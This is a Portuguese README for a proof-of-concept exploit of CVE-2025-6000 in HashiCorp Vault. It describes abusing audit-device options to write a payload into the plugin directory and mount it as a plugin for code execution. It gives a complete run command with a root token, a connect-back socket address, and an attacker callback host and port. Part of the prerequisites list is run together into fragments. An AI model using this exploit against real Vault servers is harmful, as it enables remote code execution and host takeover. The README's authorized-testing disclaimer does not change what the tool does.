
Prova de conceito de exploit para CVE-2025-6000, uma escalada de privilégios para RCE nos backends de auditoria do HashiCorp Vault, permitindo execução arbitrária de código com um token root.
Prova de conceito para CVE-2025-6000, uma falha de escalonamento de privilégios para RCE nos
backends de auditoria do HashiCorp Vault. O dispositivo de auditoria permite que um chamador
privilegiado controle as opções prefix, file_path e mode sem validação. Ao
gravar um payload executável no plugin_directory do Vault e, em seguida, registrá-lo
e montá-lo como um plugin, um atacante com um token raiz pode executar código arbitrário
no host do Vault.
https://github.com/user-attachments/assets/f8d6c90a-b511-4e96-8e4d-718c7a765601
plugin_directory configurado.sys/audit, sys/plugins,
sys/mounts).python3 CVE-2025-6000.py <vault-host> <vault-port> --token <root-token> \
--socket-addr <ip:port Vault dials> \
--listen-port 9861 \
--callback-host <seu-ip> --callback-port 8000 \
--cleanup
--socket-addr — endereço que o Vault acessa para o fluxo de auditoria (seu IP:porta de VPN
ou um endpoint TCP ngrok).--listen-port — porta local à qual o servidor de captura se vincula.--callback-host / --callback-port — endpoint HTTP usado para confirmar a
execução.--cleanup — remove os dispositivos de auditoria, o plugin e a montagem no final.Se a captura falhar, o script recorre a um prompt manual de SHA256. Execute -h para
todas as opções.
Para testes de segurança autorizados, pesquisa e educação apenas. Use somente contra sistemas que você possui ou para os quais tenha permissão escrita explícita para testar. Você é o único responsável pelo uso deste software; os autores não aceitam nenhuma responsabilidade por uso indevido ou danos. O acesso não autorizado a sistemas de computador é ilegal.
MIT — consulte LICENSE.